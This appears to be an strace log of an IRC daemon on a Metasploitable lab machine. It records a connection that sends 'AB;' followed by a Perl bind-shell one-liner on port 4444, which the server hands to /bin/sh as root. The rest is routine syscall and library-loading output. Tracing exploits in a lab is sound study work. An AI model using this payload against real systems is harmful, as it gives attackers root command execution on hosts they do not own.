4519  07:45:29.548579 select(1024, [2 3 4 7 9], [], NULL, {0, 20000}) = 0 (Timeout)

4519  07:45:29.560891 clock_gettime(CLOCK_MONOTONIC, {3139, 377927202}) = 0

4519  07:45:29.560931 gettimeofday({1495626329, 560936}, NULL) = 0

4519  07:45:29.560944 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:45:29.560999 clock_gettime(CLOCK_MONOTONIC, {3139, 378012049}) = 0

4519  07:45:29.561011 recv(5, 0x80b7ec0, 8192, 0) = -1 ECONNRESET (Connection reset by peer)

4519  07:45:29.561031 getsockopt(5, SOL_SOCKET, SO_ERROR, [0], [4]) = 0

4519  07:45:29.561052 send(5, "ERROR :Closing Link: [10.0.2.4] (Connection reset by peer)\r\n", 60, 0) = -1 EPIPE (Broken pipe)

4519  07:45:29.561072 --- SIGPIPE (Broken pipe) @ 0 (0) ---

4519  07:45:29.561104 close(5)          = 0

4519  07:45:29.561123 time(NULL)        = 1495626329

4519  07:45:29.561132 time(NULL)        = 1495626329

4519  07:45:29.561148 gettimeofday({1495626329, 561152}, NULL) = 0

4519  07:45:29.561159 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:45:29.561186 clock_gettime(CLOCK_MONOTONIC, {3139, 378199354}) = 0

4519  07:45:29.561197 gettimeofday({1495626329, 561200}, NULL) = 0

4519  07:45:29.561207 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 830000})

4519  07:45:29.734764 clock_gettime(CLOCK_MONOTONIC, {3139, 551815367}) = 0

4519  07:45:29.734817 accept(2, 0, NULL) = 5

4519  07:45:29.734854 getpeername(5, {sa_family=AF_INET, sin_port=htons(43327), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:45:29.734886 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:45:29.734899 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:45:29.734913 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:45:29.734925 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:45:29.734937 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:45:29.734948 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:45:29.734960 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:45:29.734977 clock_gettime(CLOCK_MONOTONIC, {3139, 551991165}) = 0

4519  07:45:29.734990 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:45:29.735005 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:45:29.735015 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:45:29.735024 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:45:29.735035 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:45:29.735051 send(6, "\374o\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:45:29.735149 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:45:29.735168 gettimeofday({1495626329, 735171}, NULL) = 0

4519  07:45:29.735180 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:45:29.741954 clock_gettime(CLOCK_MONOTONIC, {3139, 558971900}) = 0

4519  07:45:29.741972 recvfrom(6, "\374o\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\220\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:45:29.742012 close(6)          = 0

4519  07:45:29.742027 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:45:29.742041 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:45:29.742099 time(NULL)        = 1495626329

4519  07:45:29.742111 time(NULL)        = 1495626329

4519  07:45:29.742123 gettimeofday({1495626329, 742127}, NULL) = 0

4519  07:45:29.742135 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:45:29.742164 clock_gettime(CLOCK_MONOTONIC, {3139, 559176668}) = 0

4519  07:45:29.742174 gettimeofday({1495626329, 742178}, NULL) = 0

4519  07:45:29.742185 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:45:30.740422 clock_gettime(CLOCK_MONOTONIC, {3140, 557444500}) = 0

4519  07:45:30.740447 gettimeofday({1495626330, 740451}, NULL) = 0

4519  07:45:30.740460 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:45:30.740502 clock_gettime(CLOCK_MONOTONIC, {3140, 557514782}) = 0

4519  07:45:30.740514 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:45:30.740543 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:45:30.740560 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:45:30.740572 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:45:30.740589 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 13067

13067 07:45:30.740658 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

13067 07:45:30.740672 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

13067 07:45:30.740682 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13067 07:45:30.740696 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

13067 07:45:30.740839 brk(0)            = 0x80f9000

13067 07:45:30.740878 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.740895 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7faf000

13067 07:45:30.740912 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.740929 open("/etc/ld.so.cache", O_RDONLY) = 1

13067 07:45:30.740955 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13067 07:45:30.740974 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa7000

13067 07:45:30.740984 close(1)          = 0

13067 07:45:30.740994 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.741009 open("/lib/libncurses.so.5", O_RDONLY) = 1

13067 07:45:30.741022 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

13067 07:45:30.741115 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

13067 07:45:30.741132 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f77000

13067 07:45:30.741144 mmap2(0xb7fa4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fa4000

13067 07:45:30.741160 close(1)          = 0

13067 07:45:30.741172 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.741186 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

13067 07:45:30.741199 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

13067 07:45:30.741302 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

13067 07:45:30.741350 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f73000

13067 07:45:30.741378 mmap2(0xb7f75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f75000

13067 07:45:30.741414 close(1)          = 0

13067 07:45:30.741439 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.741453 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

13067 07:45:30.741467 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

13067 07:45:30.741567 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

13067 07:45:30.741584 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f72000

13067 07:45:30.741597 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e23000

13067 07:45:30.741608 mmap2(0xb7f6c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f6c000

13067 07:45:30.741622 mmap2(0xb7f6f000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f6f000

13067 07:45:30.741636 close(1)          = 0

13067 07:45:30.741657 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e22000

13067 07:45:30.741669 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e226b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

13067 07:45:30.741723 mprotect(0xb7f6c000, 4096, PROT_READ) = 0

13067 07:45:30.741759 munmap(0xb7fa7000, 29913) = 0

13067 07:45:30.741796 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.741839 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

13067 07:45:30.741875 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff220e0) = -1 ENOTTY (Inappropriate ioctl for device)

13067 07:45:30.741904 brk(0)            = 0x80f9000

13067 07:45:30.741917 brk(0x80fa000)    = 0x80fa000

13067 07:45:30.741928 brk(0x80fb000)    = 0x80fb000

13067 07:45:30.741944 getuid32()        = 0

13067 07:45:30.741953 getgid32()        = 0

13067 07:45:30.741962 geteuid32()       = 0

13067 07:45:30.741971 getegid32()       = 0

13067 07:45:30.741984 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.741997 time(NULL)        = 1495626330

13067 07:45:30.742009 brk(0x80fc000)    = 0x80fc000

13067 07:45:30.742023 brk(0x80fd000)    = 0x80fd000

13067 07:45:30.742044 open("/proc/meminfo", O_RDONLY) = 1

13067 07:45:30.742074 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

13067 07:45:30.742092 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fae000

13067 07:45:30.742103 read(1, "MemTotal:      1035240 kB\nMemFree:        288408 kB\nBuffers:         91744 kB\nCached:         493200 kB\nSwapCached:          0 kB\nActive:         258452 kB\nInactive:       455424 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        288168 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4808 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52012 kB\nSlab:            21604 kB\nSReclaimable:    12668 kB\nSUnreclaim:       8936 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

13067 07:45:30.742185 close(1)          = 0

13067 07:45:30.742195 munmap(0xb7fae000, 4096) = 0

13067 07:45:30.742207 brk(0x80fe000)    = 0x80fe000

13067 07:45:30.742232 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

13067 07:45:30.742245 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

13067 07:45:30.742256 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13067 07:45:30.742268 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13067 07:45:30.742279 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

13067 07:45:30.742280 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

13067 07:45:30.742280 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.742280 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13067 07:45:30.742280 uname({sys="Linux", node="metasploitable", ...}) = 0

13067 07:45:30.742280 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

13067 07:45:30.742281 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13067 07:45:30.742281 brk(0x8100000)    = 0x8100000

13067 07:45:30.742281 getcwd("/etc/unreal", 4096) = 12

13067 07:45:30.742281 getpid()          = 13067

13067 07:45:30.742282 getppid()         = 4519

13067 07:45:30.742282 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13067 07:45:30.742282 stat64("/sbin/sh", 0xbff220b8) = -1 ENOENT (No such file or directory)

13067 07:45:30.742282 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

13067 07:45:30.742299 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

13067 07:45:30.742322 socket(PF_FILE, SOCK_STREAM, 0) = 1

13067 07:45:30.742335 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

13067 07:45:30.742347 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

13067 07:45:30.742408 close(1)          = 0

13067 07:45:30.742435 socket(PF_FILE, SOCK_STREAM, 0) = 1

13067 07:45:30.742445 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

13067 07:45:30.742456 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

13067 07:45:30.742474 close(1)          = 0

13067 07:45:30.742487 open("/etc/nsswitch.conf", O_RDONLY) = 1

13067 07:45:30.742514 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

13067 07:45:30.742531 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fae000

13067 07:45:30.742542 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

13067 07:45:30.742593 read(1, "", 4096) = 0

13067 07:45:30.742602 close(1)          = 0

13067 07:45:30.742611 munmap(0xb7fae000, 4096) = 0

13067 07:45:30.742627 open("/etc/ld.so.cache", O_RDONLY) = 1

13067 07:45:30.742640 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13067 07:45:30.742655 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa7000

13067 07:45:30.742665 close(1)          = 0

13067 07:45:30.742675 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.742690 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

13067 07:45:30.742704 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

13067 07:45:30.742791 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

13067 07:45:30.742807 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e19000

13067 07:45:30.742819 mmap2(0xb7e20000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e20000

13067 07:45:30.742835 close(1)          = 0

13067 07:45:30.742847 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.742872 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

13067 07:45:30.742916 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

13067 07:45:30.743037 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

13067 07:45:30.743054 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e01000

13067 07:45:30.743065 mmap2(0xb7e15000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e15000

13067 07:45:30.743083 mmap2(0xb7e17000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e17000

13067 07:45:30.743097 close(1)          = 0

13067 07:45:30.743123 munmap(0xb7fa7000, 29913) = 0

13067 07:45:30.743140 open("/etc/ld.so.cache", O_RDONLY) = 1

13067 07:45:30.743152 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13067 07:45:30.743168 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa7000

13067 07:45:30.743178 close(1)          = 0

13067 07:45:30.743188 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.743202 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

